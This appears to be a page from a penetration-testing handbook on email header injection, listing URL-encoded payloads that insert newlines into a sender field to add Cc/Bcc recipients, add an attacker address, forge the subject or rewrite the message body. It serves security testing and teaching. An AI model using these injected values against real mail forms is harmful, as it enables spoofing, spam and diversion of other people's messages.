> For the complete documentation index, see [llms.txt](https://n3t-hunt3r.gitbook.io/pentest-book/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://n3t-hunt3r.gitbook.io/pentest-book/web-application-pentesting/email-header-injection.md).

# Email Header Injection

## Email Header Injection

<https://resources.infosecinstitute.com/email-injection/>

### Inject Cc and Bcc after sender argument

```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```

The message will be sent to the recipient and recipient1 accounts.

### Inject argument

```
From:sender@domain.com%0ATo:attacker@domain.com
```

The message will be sent to the original recipient and the attacker account.

### Inject Subject argument

```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```

The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.

### Change the body of the message

Inject a two-line feed, then write your message to change the body of the message.

```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
